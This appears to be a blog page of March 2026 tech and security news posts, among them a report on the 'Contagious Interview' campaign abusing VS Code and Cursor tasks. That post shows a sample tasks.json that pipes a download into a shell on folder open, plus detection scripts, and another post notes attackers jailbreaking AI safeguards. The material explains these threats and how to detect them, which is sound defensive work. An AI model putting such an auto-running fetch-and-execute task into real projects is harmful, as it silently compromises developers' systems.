Terra Security Redefines Penetration Testing for the AI Era with Terra Portal & Appoints Anna Sarnek as Vice President of Business & Strategy

Posted in Commentary with tags on March 10, 2026 by itnerd

Terra Security, a pioneer in Agentic Offensive Security, today announced the launch of Terra Portal™, its agentic desktop app that serves as an execution layer for pentesters to direct and oversee AI-driven testing in live production environments. Terra Portal reduces the discovery-to-fix cycle for vulnerabilities from the industry average of nearly three months to a matter of hours without sacrificing safety or compliance. As a result, customers can now remediate critical findings well within the Cybersecurity and Infrastructure Security Agency’s (CISA) 15-day requirement.

Fully autonomous testing tools promise efficiency but introduce security risks and inaccuracies in production environments. Traditional pentesting tools force testers into manual workflows, limiting scalability. Terra Portal resolves this tension by enabling autonomous pentesting to scale through human-governed AI execution.

At the core of Terra Portal is a human-governed, agentic workflow featuring two distinct types of AI agents, each with different responsibilities, operating under different constraints, and governed differently by design. Ambient AI agents autonomously handle recon, code review, test case generation, reachability analysis, pentests, exploitability validation, documentation, and remediation. When complexity, risk, or organizational guardrails require expert judgment, pentesters engage with Copilot AI agents to conduct approved, controlled exploitation and reporting.

For service providers, Terra Portal enables a shift from one-off, project-based engagements to continuous, offensive security services. AI agents autonomously handle execution, while pentesters retain oversight at critical decision points. This model allows providers to support significantly more clients per tester and deliver faster turnaround times, improving customer satisfaction and retention. Governance remains intact, minimizing operational and reputation risk.

Terra Portal integrates natively with Terra’s broader agentic penetration testing platform. The platform uses a coordinated swarm of autonomous AI agents to continuously scope environments, discover attack surfaces, generate hypotheses, and validate vulnerabilities. When those agents encounter limits, Terra Portal allows human testers to operate within the same agentic workflow, preserving full context and dramatically increasing efficiency.

Early access to Terra Portal is available now. 

The company also announced today the appointment of Anna Sarnek as Vice President of Business & Strategy. Sarnek has served as a strategic advisor to Terra over the past year, helping shape the company’s strategic direction, growth trajectory, and ongoing partnership with Amazon Web Services (AWS).

Sarnek brings more than 15 years of experience spanning cybersecurity, enterprise IT, and cloud partnerships. A trusted advisor to the security community, she most recently led Cyber Startup and Venture Capital Business Development at AWS, where she managed key cyber investor and priority founder relationships to help early and growth-stage companies build strong foundations for scale. With this background, Anna is well-positioned to bridge the gap between Terra and its stakeholders, ensuring the company’s strategies remain closely aligned with evolving market demands and industry trends.

As Vice President of Business & Strategy, Sarnek will complement Terra’s organic momentum by focusing on product innovation, growth strategy, and industry partnerships, leveraging technology companies, the channel, MSSPs, and consulting firms. Drawing on her background in consulting and strategic business development, she will orchestrate alignment across Terra’s business units and partners, ensuring platform strategy, partner feedback, go-to-market execution, and long-term growth move forward in lockstep.

Terra’s approach reflects a broader belief that modern security outcomes require alignment across people, process, and technology. By investing early in trusted ecosystem relationships, from hyperscalers to leading consulting and red teaming firms, Terra is establishing a foundation for comprehensive solutions that resonate with CISOs, executive decision-makers, and frontline practitioners.

SIOS Technology Earns Multiple Industry Honors 

Posted in Commentary with tags on March 10, 2026 by itnerd

SIOS Technology Corp. today announced it has received three prestigious industry recognitions highlighting executive leadership, customer success excellence, and outstanding support performance.

Masahiro Arai, Chief Operating Officer of SIOS Technology, has been named to the South Carolina 500 by SC Biz News. The South Carolina 500 honors the most influential business leaders across the state, recognizing executives who drive economic growth, innovation, and community impact. Arai’s inclusion reflects his leadership in expanding SIOS’ global presence and advancing its high availability solutions to support mission-critical enterprise environments.

In addition, SIOS Technology’s Vice President of Customer Success, Cassius Rhue, has been named a Silver Stevie® Award winner in the Customer Service Leader of the Year Individual category in the 2025 Stevie Awards for Sales & Customer Service. The Stevie Awards for Sales & Customer Service recognize outstanding achievements by contact centers, customer service, business development, and sales professionals worldwide. Rhue was honored for his leadership in building a high-performing customer success organization focused on proactive engagement, rapid response, and measurable customer outcomes.

Further underscoring the company’s commitment to customer excellence, SIOS Technology was named a Silver winner for Support Department of the Year in the 2025 Best in Biz Awards. The Best in Biz Awards recognize companies, teams, and executives for outstanding performance and innovation across industries. The Support Department of the Year award acknowledges SIOS’ dedication to delivering responsive, expert-level support that ensures customers maintain continuous uptime for their critical applications and databases.

SIOS Technology provides high availability and disaster recovery solutions that protect mission-critical applications in physical, virtual, cloud, and hybrid environments. By combining application-aware intelligence with expert customer engagement, SIOS helps enterprises minimize downtime, reduce operational risk, and maintain business continuity in increasingly complex IT landscapes. With these latest recognitions, SIOS continues to demonstrate leadership not only in technology innovation, but also in customer-centric execution and operational excellence.

Hammerspace and Secuvy Partner to Make At-Scale Data AI-Ready, Fast and Safe, Across On-Premises and Cloud

Posted in Commentary with tags on March 10, 2026 by itnerd

Hammerspace, the high-performance data platform for AI anywhere, today announced a partnership with Secuvy to deliver a “Data-First” approach that turns raw data into secure AI outcomes. Together, the companies unify distributed unstructured data into a global namespace and continuously discover, classify, catalog, and control it across on-premises and cloud. 

Enterprise AI is hitting a hard wall, not just with compute demands, but also due to data sprawl and rising costs with no proven ROI. Unstructured data is fragmented across edge sites, legacy NAS systems, high-performance file systems, object stores and multiple clouds, often governed inconsistently. AI pipelines amplify risk by pulling from large, diverse datasets that may include confidential information. Without continuous discovery and classification, organizations risk exposing sensitive data in AI pipelines, losing track of what was used, and missing high-value insights. 

Together, Hammerspace and Secuvy keep data continuously AI-ready as it changes, so governance and access controls stay current from PoC to production.

  • Hammerspace provides the performance and orchestration layer so AI pipelines can reach distributed file and object data in place and move only what’s needed to the right compute at the right time.
     
  • Secuvy adds the intelligence layer, continuously identifying sensitive data and associated risks so privacy and governance controls can be applied consistently across hybrid and multi-cloud environments.

Image: The Integration of Hammerspace and Secuvy: A Data-First Model that Makes Data AI-Ready

Benefits of Hammerspace and Secuvy Partnership

Hammerspace and Secuvy enable a true Data-First model that makes data AI-ready. The integrated platform understands what the data is, where it lives, and the risk it carries, then controls how it’s used and where it can move, without forcing enterprises to rearchitect projects. Copying data drives up costs and increases risk: when data is duplicated across systems, governance breaks down and auditing, tracking, and securing it becomes difficult, allowing sensitive data to slip into AI pipelines without clear lineage or policy enforcement.

With the Hammerspace + Secuvy “Data-First” integration, organizations can make data AI-ready and enable:
 

  • One Global View – Unify distributed unstructured data into a global namespace across edge, on-premises, and multi-cloud
  • Sensitive Data Visibility – Continuously discover and classify sensitive data (PII/PHI/financial/IP) across file and object stores before it enters AI pipelines
  • Policy-Controlled Access – Catalog and control data in place using policies based on data attributes and risk
  • Continuous Compliance – Maintain consistent security and audit controls as data moves across sites and clouds—without copy-first silos
  • Just-In-Time Data – Move only what’s needed, when it’s needed, with intent-based data movement to compute
  • Use What You Have – Leverage existing storage as the foundation and free data to be processed wherever GPUs are available



Attackers weaponizing VS Code and Cursor tasks to silently infect developer systems

Posted in Commentary with tags on March 9, 2026 by itnerd

Researchers from Abstract Security’s ASTRO research team have uncovered new developments in the evolving “Contagious Interview” campaign, showing how attackers are increasingly abusing developer tools—including Visual Studio Code and the AI-powered Cursor code editor—to silently execute malware on developer machines. Here is the blog post: Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains Part 2.

ASTRO analysts detail how attackers are embedding malicious commands into IDE task configuration files. When a developer opens a cloned repository and approves the standard workspace trust prompt, the tasks execute automatically, triggering multi-stage infection chains without requiring the victim to run any code manually.
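The auto-run mechanism described hinges on VS Code’s task `runOptions`: a task with `"runOn": "folderOpen"` executes as soon as the workspace is trusted. A minimal sketch of what such a booby-trapped `.vscode/tasks.json` could look like (the label and URL below are placeholder illustrations, not artifacts from the actual campaign):

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "curl -s https://example.com/stage1 | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

An innocuous-sounding label like "build" is part of the disguise: the task appears to be ordinary project tooling while its command fetches and executes a remote script.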

Key findings from the research include:

  • New payload staging infrastructure: Attackers are shifting from previously exposed hosting platforms to GitHub Gists, URL shorteners, and Google Drive to stage malicious scripts and payloads.
  • Developer-focused social engineering: Malicious repositories disguised as interview projects or legitimate development tools execute automatically when opened in an IDE.
  • Multi-stage infection chains: Initial task execution downloads additional loaders and can ultimately deploy infostealers or backdoors targeting browser credentials, crypto wallets, and system data.
  • Evasion tactics: Some payloads are hidden off-screen in configuration files or masquerade as legitimate GPU or driver tooling to avoid detection.

The report also outlines detection opportunities for security teams, including monitoring IDE-spawned shell commands, suspicious use of URL shorteners in configuration files, and unusual process chains involving Node.js and Python runtimes.
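As a rough illustration of that configuration-file detection idea, here is a hypothetical Python sketch that flags auto-running tasks whose command lines reference the kinds of staging hosts named in the findings. The host list and the `flag_tasks` helper are illustrative assumptions, not part of the ASTRO tooling:

```python
import json
import re

# Hypothetical shortener/hosting domains of the kind abused for payload staging
SUSPICIOUS_HOSTS = re.compile(
    r"(bit\.ly|tinyurl\.com|gist\.githubusercontent\.com|drive\.google\.com)",
    re.IGNORECASE,
)

def flag_tasks(tasks_json: str) -> list[str]:
    """Return labels of tasks that auto-run on folder open and whose
    command line references a suspicious host."""
    findings = []
    for task in json.loads(tasks_json).get("tasks", []):
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmd = str(task.get("command", "")) + " " + " ".join(task.get("args", []))
        if auto and SUSPICIOUS_HOSTS.search(cmd):
            findings.append(task.get("label", "<unnamed>"))
    return findings

sample = """{
  "version": "2.0.0",
  "tasks": [{
    "label": "prebuild",
    "type": "shell",
    "command": "curl -sL https://bit.ly/xyz | sh",
    "runOptions": {"runOn": "folderOpen"}
  }]
}"""
print(flag_tasks(sample))  # -> ['prebuild']
```

A production detection would also inspect process lineage (IDE spawning shells, Node.js, or Python), but even a static scan of repository task files like this can surface obvious lures before they are opened.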

Given the growing use of AI-assisted development environments and the trust developers place in their toolchains, researchers warn this technique could become a major new software supply-chain attack vector.

The first blog post about Contagious Interview is here: https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains.

Russia State Hackers Target Signal & WhatsApp Accounts of Officials & Journalists

Posted in Commentary with tags on March 9, 2026 by itnerd

The Dutch Minister of Defence warns of a cyber campaign linked to Russia that targets accounts on messaging platforms such as Signal and WhatsApp, belonging to government officials, military staff, and journalists.

The Russian campaign focuses on persuading users to divulge their security verification codes and PINs, allowing the hackers to gain access to the users’ Signal or WhatsApp accounts. The most frequently observed method is to masquerade as a Signal support chatbot in order to induce targets to divulge their codes. The hackers can then use these codes to take over the user’s account. Another method takes advantage of the ‘linked devices’ function within Signal and WhatsApp.

Once an account has been successfully compromised, the hackers can read incoming messages, including messages in the victim’s chat groups. The Russian hackers likely gained access to sensitive information through this campaign.

Ömer Faruk Diken, cybersecurity researcher at SOCRadar:

“Messaging apps such as Signal and WhatsApp are widely used for private and professional communication. Many officials and journalists rely on them because they use end-to-end encryption. However, though encryption protects messages during transmission, it does not prevent attackers from accessing the account itself. If attackers gain control of the account or connect their own device, they can read conversations and collect information from chats and contact lists. For threat actors involved in espionage, this access can provide insight into discussions, contacts, and internal coordination.

“The warning from Dutch officials highlights a cyber campaign that targets messaging accounts used by people who handle sensitive information. By using social engineering and abusing messaging app features, attackers attempt to gain access to private conversations and contacts. Incidents like this also highlight the importance of basic security practices. Users should avoid clicking unknown links, never enter passwords or verification codes on suspicious pages, and always verify the source of requests for sensitive information. Email addresses can also be spoofed, so messages that ask users to click links or provide input should be checked carefully. When possible, organizations should enforce multi-factor authentication to add another layer of protection to communication accounts.”

Lydia Atienza, Principal Threat Intelligence Researcher at Outpost24:

“Based on the techniques described in the advisory issued by Dutch intelligence agencies, there is little evidence of particularly novel tradecraft. The methods resemble the same social-engineering tactics long used by financially motivated cybercriminals to compromise messaging accounts. This serves as a reminder that state-linked actors do not always rely on highly sophisticated exploits. In many cases, the same techniques commonly seen in cybercrime can be just as effective in espionage campaigns.”

Additional Resources:

SOCRadar Blog: Russia Targets Signal and WhatsApp Accounts, Dutch Officials Warn

Microsoft Warns Hackers Operationalizing AI to Accelerate Tradecraft 

Posted in Commentary with tags on March 9, 2026 by itnerd

Microsoft has warned that threat actors are operationalizing AI along the cyberattack lifecycle to accelerate tradecraft, abusing both intended model capabilities and jailbreaking techniques to bypass safeguards and perform malicious activity. They’re embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations.

Microsoft Threat Intelligence has observed that most malicious use of AI today centers on using language models for producing text, code, or media. Threat actors use generative AI to draft phishing lures, translate content, summarize stolen data, generate or debug malware, and scaffold scripts or infrastructure. For these uses, AI functions as a force multiplier that reduces technical friction and accelerates execution, while human operators retain control over objectives, targeting, and deployment decisions.

This dynamic is especially evident in operations likely focused on revenue generation, where efficiency directly translates to scale and persistence. To illustrate these trends, this blog highlights observations from North Korean remote IT worker activity tracked by Microsoft Threat Intelligence as Jasper Sleet and Coral Sleet (formerly Storm-1877), where AI enables sustained, large‑scale misuse of legitimate access through identity fabrication, social engineering, and long‑term operational persistence at low cost.

More details can be found here: https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/

Ensar Seker, CISO at SOCRadar:

“AI is rapidly becoming embedded across the entire cyberattack lifecycle, but not always in the ways people expect. In many cases, threat actors are not building their own advanced AI models; instead, they are operationalizing existing generative AI tools to accelerate traditional attacker workflows. We are seeing AI used to scale reconnaissance, generate convincing phishing content in multiple languages, automate vulnerability research, and refine social engineering campaigns. The real shift is not sophistication alone, it is the speed and scale at which attackers can now execute tasks that previously required significant manual effort.

“The biggest impact of AI in cyber operations is efficiency rather than completely new attack techniques. Attackers are using AI to shorten the time between reconnaissance and exploitation. For example, AI can help analyze large datasets of leaked credentials, generate exploit scripts, or summarize technical documentation for vulnerabilities. This lowers the barrier to entry for less experienced actors while allowing more advanced groups to increase operational tempo and run campaigns in parallel across multiple targets.

“However, AI does not replace traditional attacker tradecraft or eliminate the need for human expertise. Sophisticated campaigns, especially those conducted by nation-state groups, still rely heavily on manual reconnaissance, custom tooling, and operational security discipline. AI is acting more as a force multiplier than a replacement for established tactics. Threat actors still need access, infrastructure, and a clear objective; AI simply helps them move faster once those elements are in place.

“For defenders, the most important takeaway is that AI-driven attacks will increasingly look more polished, personalized, and scalable. Security teams should expect a rise in high-quality phishing, automated reconnaissance against external assets, and AI-assisted malware development. The response should not be panic about AI itself, but investment in visibility, especially around identity, external attack surface, and threat intelligence, so organizations can detect attacker activity early in the intrusion lifecycle before AI-assisted campaigns gain momentum.”

Martin Jartelius, AI Product Director at Outpost24:

“We are seeing the same trend in our own research. In one recent investigation, we observed a threat actor using ChatGPT to assist with vulnerability research related to potential zero-day exploitation. In this case, the attacker’s operational security was weak enough that their activity left a visible trail, giving us rare insight into how generative AI is being used as a ‘research assistant’ during attack preparation. What this highlights is that AI is increasingly acting as a force multiplier for attackers, accelerating reconnaissance, scripting, and vulnerability analysis while lowering the technical barrier to entry.”

AI can do a lot of cool things. But it can also do a lot of bad things if given the chance. Which means that those who defend against attacks should expect more attacks than ever before. And that is of course a bad thing.

Threat Actors Abuse GitHub Notifications to Deliver Vishing Attacks 

Posted in Commentary with tags on March 9, 2026 by itnerd

The Fortra Intelligence and Research Experts (FIRE) team has uncovered a new phishing tactic that abuses legitimate GitHub notification emails to deliver vishing scams. The research shows how attackers are using trusted infrastructure to land malicious messages in inboxes.

Key findings:

  • Attackers hide vishing lures in GitHub commit messages, which generate legitimate notification emails from noreply@github.com.
  • Researchers say this is the first observed use of GitHub commit messages to distribute vishing scams.
  • Notifications are forwarded through Microsoft 365, helping the messages pass authentication checks and evade filters.
  • The lures impersonate brands such as PayPal and Norton and urge victims to call fake support numbers.
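Because these lures arrive via authenticated GitHub infrastructure, sender reputation alone won’t catch them; the scam’s actionable elements live in the message text: a callback phone number plus an impersonated brand. A minimal Python heuristic along those lines (the indicator lists and the `looks_like_vishing` helper are illustrative assumptions, not Fortra’s detection logic):

```python
import re

# Hypothetical indicators: a US toll-free callback number plus an impersonated brand
PHONE = re.compile(
    r"\+?1?[\s\-.]?\(?8(00|33|44|55|66|77|88)\)?[\s\-.]?\d{3}[\s\-.]?\d{4}"
)
BRANDS = ("paypal", "norton", "mcafee", "geek squad")

def looks_like_vishing(text: str) -> bool:
    """Flag text that pairs a toll-free number with a commonly spoofed brand."""
    lowered = text.lower()
    return bool(PHONE.search(text)) and any(b in lowered for b in BRANDS)

lure = "Your PayPal order of $599 was approved. To cancel, call +1 (888) 555-0142."
print(looks_like_vishing(lure))  # -> True
```

A heuristic this simple will miss variants and misfire on legitimate billing mail, so in practice it would feed a review queue rather than a blocking rule, but it illustrates why content inspection matters when the transport itself is trusted.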

The report is published here: https://www.fortra.com/blog/threat-actors-abuse-github-notifications-to-deliver-vishing-attacks

Mega raises $11.5M to give every SMB an enterprise-grade growth team, without the agency

Posted in Commentary with tags on March 9, 2026 by itnerd

Most small to medium business owners have the same relationship with their marketing agency: they pay for effort and hope it turns into outcomes. It rarely feels like a fair trade. Mega is built to fix that. Today, the company announced an $11.5 million Series A to scale a full-service AI growth engine for SMBs – a platform that replaces traditional agencies with a network of AI agents delivering predictable growth without the overhead.

The Series A funding round was led by Goodwater Capital with participation from Andreessen Horowitz, Atreides, SignalFire and Kearny Jackson. It also includes WNBA stars Diana Taurasi, Breanna Stewart, Kelsey Plum and Nneka Ogwumike. 

The problem is structural. SMBs today are expected to compete in a digital ecosystem built for enterprises, across SEO, paid ads, websites, and emerging AI channels. Agencies are expensive relative to SMB budgets, quality varies wildly, execution is manual, and iteration is slow.  At the same time, AI marketing tools have flooded the market, but most still require business owners to learn and operate complex software. Mega takes a different approach by delivering services via software. Instead of managing tools, customers receive execution and measurable performance.

Mega’s core product is an AI-powered growth engine designed specifically for businesses generating roughly $500,000 to $20 million in revenue. The platform uses a network of specialized AI agents to handle SEO, GEO, paid ads, and website management. From the customer’s perspective, it feels like hiring a high-quality growth team, but it runs as software. The system plans, executes, optimizes, and reports continuously. If a customer signs up and never logs in, their marketing still runs and improves.

Mega’s path to market was unplanned. During Covid, the team was building a video game company. When ChatGPT launched, they began experimenting early, building internal AI tools to accelerate their own growth. Organic traffic increased 100-fold. Paid customer acquisition costs dropped by 80 percent. When co-founder Lucas Pellan shared the tools with founder friends, the response was immediate and repeated: can we have that?

With Mega, approximately 55 percent of the work is fully automated, 35 percent is mostly automated with humans in the loop, and 10 percent is executed end to end by humans. This hybrid structure allows Mega to deliver consistent, scalable performance while maintaining quality control. Every campaign feeds data back into the system, improving creative generation, audience targeting, bidding strategies, and optimization logic across the entire customer base.

Mega’s own trajectory reflects the demand for this model. The company went from zero to $10 million in revenue in 10 months. Customers span home services, law firms, healthcare businesses, ecommerce brands, and software companies. 

In one case, Mega helped a Texas medical spa grow search traffic by 174 times. A personal injury law firm increased search visibility by 243 times and began ranking in the top three for key terms. A D2C health brand drove $120,000 in direct website revenue and surpassed its Amazon marketplace performance without increasing ad spend. On average, Mega helps customers grow 20% faster.

The market is massive and underserved. Tens of thousands of marketing agencies serve SMBs across North America, yet most businesses still struggle with unpredictable lead flow, poor ROI, and no visibility into what is working. As digital channels get more competitive and expensive, the gap keeps widening. AI now makes it possible to close it. 

Looking ahead, Mega plans to expand beyond SEO, ads, and websites into managing the entire revenue generation engine for SMBs, including email, outbound, organic social, lead qualification, sales operations, and reporting. The long-term vision is to provide a fully automated growth infrastructure that allows small and mid-sized businesses to compete with enterprise-grade marketing capability, without enterprise overhead.

CData Expands Connect AI Platform with New Agent Tooling and Enterprise-Grade Security

Posted in Commentary with tags on March 9, 2026 by itnerd

CData Software today announced major enhancements to CData Connect AI at the Gartner Data & Analytics Summit (Booth #308). The updates extend CData’s managed Model Context Protocol (MCP) platform with new capabilities across connectivity, context, and control, the three pillars required to move AI from experimentation to production.

Why AI Stalls Before Production

AI investment is accelerating. Gartner® projects that worldwide AI spending will total $2.5 trillion in 2026. But spending isn’t translating into results. Most generative AI initiatives still stall before reaching production. The bottleneck isn’t model capability, it’s the data infrastructure underneath. Without live connectivity to business systems, semantic intelligence that gives data context to AI, and governance controls that enforce security at scale, AI initiatives fail to deliver business value.

CData’s own State of AI Data Connectivity Report reinforces this reality. Only 6% of organizations are satisfied with their current data infrastructure for AI. More than half still rely on custom-built integrations that can’t scale. And 71% of AI teams spend over a quarter of their implementation time on data integration alone, time spent wiring plumbing instead of building intelligence.

Connect AI: Connectivity, Context, and Control in a Single Platform

CData Connect AI is purpose-built to address the data infrastructure gaps that prevent AI from reaching production. Today’s enhancements extend the platform across all three pillars:

Connectivity: Connect Gateway and 350+ Data Sources

Connect AI provides live, read-write access to more than 350 business systems, without replication or data movement. The new Connect Gateway extends this reach to data sources behind the firewall, with support for SAP, SQL Server, PostgreSQL, and more. The result: AI systems can operate against live data regardless of where it resides.

Context: Expanded Agent Tooling and Toolkits

AI agents need business-aware context to choose the right actions and avoid unnecessary MCP tool calls. But exposing too much context creates new risks: increased token usage, model confusion, and unintended access to sensitive data or operations. Connect AI addresses this challenge with a scoped MCP architecture that precisely controls what each agent can see and do. This release introduces three complementary tool types:

  • Universal Tools provide a normalized set of operations that work consistently across all 350+ connected systems. Instead of exposing hundreds of system-specific tools, agents receive a compact, schema-aware interface ideal for data exploration, ad-hoc analysis, and multi-source reasoning — without tool surface bloat.
  • Source Tools expose tightly defined operations specific to each system. These tools map directly to approved system actions, allowing IT teams to enforce predictable execution, transactional safety, and auditability for production workflows.
  • Custom Tools allow organizations to define purpose-built operations tailored to specific workflows. These tools execute pre-optimized queries with explicit data access limits — reducing token usage, improving performance, and eliminating unintended data exposure.

Workspaces define the data boundary for each agent by specifying exactly which datasets, schemas, or views are accessible. New Toolkits define the action boundary by determining which Universal, Source, or Custom Tools are available. Each Workspace and Toolkit combination can be deployed as a dedicated MCP server, ensuring that agents operate only within their intended scope, reducing context noise, strengthening governance, and delivering enterprise-grade control over agent behavior.

Control: SCIM and Custom OAuth Applications

Connect AI enforces per-user authentication with native source-system permissions applied dynamically at runtime, backed by full audit trails. New governance enhancements include SCIM 2.0 for automated identity lifecycle management and Custom OAuth Applications that enable organizations to use first-party credentials to meet internal security and compliance requirements. Every query is authenticated, authorized, and auditable.

The 25% Accuracy Gap: Why Architecture Matters

MCP is becoming the default interface between AI agents and business software. But how accurately do MCP providers actually return data? To find out, CData tested five MCP providers, representing the major architectural approaches in the market, across four sources (CRM, project management, data warehouse, and ERP) using 378 real-world prompts. Every response was scored against pre-established ground truth. No partial credit.

The results revealed a significant accuracy gap. CData Connect AI achieved 98.5% accuracy (67 of 68 correct responses). The other providers ranged from 65% to 75%—failing on one out of every three to four queries. The failures weren’t random: they clustered around relative date logic, multi-filter queries, semantic interpretation of business terms, and write operations, exactly the kinds of tasks AI agents need to perform reliably every day.

For organizations moving beyond copilots toward autonomous agents that read, write, and act on live business data, this gap is decisive. At 75% accuracy, an AI agent fails one out of every four actions. And that inaccuracy compounds: 75% accuracy across a five-step workflow means less than 24% of processes complete successfully. A 75% accuracy rate becomes a 75% failure rate.
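The compounding arithmetic behind that claim is straightforward to check: if each of five independent steps succeeds 75% of the time, the whole workflow succeeds only when every step does.

```python
# At 75% per-step accuracy, a five-step agent workflow succeeds end to end
# only if all five steps succeed: 0.75 ** 5
p_step = 0.75
p_workflow = p_step ** 5
print(f"{p_workflow:.1%}")  # -> 23.7%
```

This assumes step failures are independent; in real agent workflows an early error often cascades, so end-to-end completion can be even lower than the naive product suggests.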

Most MCP providers translate natural language directly into API calls, which works for simple lookups but breaks down when queries require date math, multi-condition filtering, or platform-specific business logic. Connect AI uses a relational abstraction layer with semantic intelligence that understands entity relationships, business conventions, and workflow rules. That’s why it maintained near-perfect accuracy across every platform tested, including ERP, where the vendor’s own native MCP server failed completely.

View the full benchmarking methodology and results here: https://www.cdata.com/lp/ai-accuracy-whitepaper/

Organizations deploying AI in production need an accuracy rate that prevents autonomous agents from creating more cleanup work than they save. Connect AI is built to clear that bar because connectivity, context, and control aren’t just platform features. They’re what makes accuracy at scale possible.

CData at Gartner Data & Analytics Summit

CData will be at the Gartner Data & Analytics Summit at Booth #308, where attendees can connect with the team and see the latest in universal data connectivity.

Speaking Session: AI Agents and the Future of Digital Work with Microsoft — CData Chief Product Officer Ken Yagen will take the stage alongside Microsoft Partner Director of Product Management James Oleinik on Wednesday, March 11 (11:15–11:45 AM EDT). The session will present a joint blueprint for moving from AI pilots to production-ready agentic AI, exploring how Copilot Studio and universal data connectivity can deliver the governed infrastructure enterprises need as Gartner predicts 40%+ of agentic AI projects will be canceled by 2027 without the right architecture in place.

Supporting Resources

  • The 25% Accuracy Gap: MCP Provider Performance Across Enterprise Workloads — CData’s benchmark of five MCP providers across 378 enterprise queries found a 25+ percentage point accuracy gap, with CData Connect AI achieving 98.5% accuracy compared to 65–75% for other providers. Download the whitepaper: https://www.cdata.com/lp/ai-accuracy-whitepaper/
  • The State of AI Data Connectivity Report: 2026 Outlook — Based on research with 200+ data and AI leaders and insights from AI pioneers at Microsoft, AWS, and Google, CData’s report found that only 6% of enterprises consider their data infrastructure fully ready for AI — establishing a direct link between data infrastructure maturity and AI success. Download the report: https://www.cdata.com/lp/ai-data-connectivity-report-2026/

¹ Gartner, Inc., “Gartner Says Worldwide AI Spending Will Total $2.5 Trillion in 2026,” Gartner.com (Jan. 15, 2026), accessed Feb. 20, 2026, https://www.gartner.com/en/newsroom/press-releases/2026-1-15-gartner-says-worldwide-ai-spending-will-total-2-point-5-trillion-dollars-in-2026
GARTNER is a trademark of Gartner, Inc. and/or its affiliates.

How the February 28 Strikes Triggered a New Wave of AI-Assisted Attacks on US Critical Infrastructure

Posted in Commentary with tags on March 9, 2026 by itnerd

CloudSEK has posted a pair of research reports that are highly relevant to the cyber dimension of the Iran-US conflict, especially in light of developments since the February 28 strikes.

Following the February 28 US-Israel strikes on Iran, CloudSEK has documented an immediate and significant surge in Iranian-aligned cyber activity targeting US critical infrastructure, with AI now acting as a direct force multiplier for threat actors.

The key findings:

  • Over 60 Iranian-aligned hacktivist groups activated on Telegram within hours of the February 28 strikes, the largest single-event mobilization of this ecosystem ever recorded.
  • An Electronic Operations Room was formed on Telegram to coordinate attacks, operating on ideological initiative rather than central state direction, which makes activity harder to predict and constrain.
  • More than 40,000 US industrial control systems are currently reachable on the public internet, many with default or no credentials, representing an immediately exploitable attack surface.
  • CloudSEK researchers demonstrated that an actor with no prior ICS knowledge can move from intent to a working list of accessible US industrial targets in under five minutes using AI tools and passive reconnaissance. No scanning, no exploitation, no specialist knowledge required.
  • The same AI platforms now embedded in US defense operations are accessible to threat actors for offensive reconnaissance, creating a dual-use dynamic that significantly widens the threat.

Both reports are primary-sourced, technically detailed, and directly tied to the current conflict escalation. The full write-ups are here:

Report 1: AI, the Iran-US Conflict, and the Threat to US Critical Infrastructure
https://www.cloudsek.com/blog/ai-the-iran-us-conflict-and-the-threat-to-us-critical-infrastructure

Report 2: Threat Actor Landscape Assessment of ICS/OT Targeting in the 2026 Iran-US Conflict
https://www.cloudsek.com/blog/a-threat-actor-landscape-assessment-of-ics-ot-targeting-in-the-2026-iran-us-conflict-and-the-scale-of-the-risk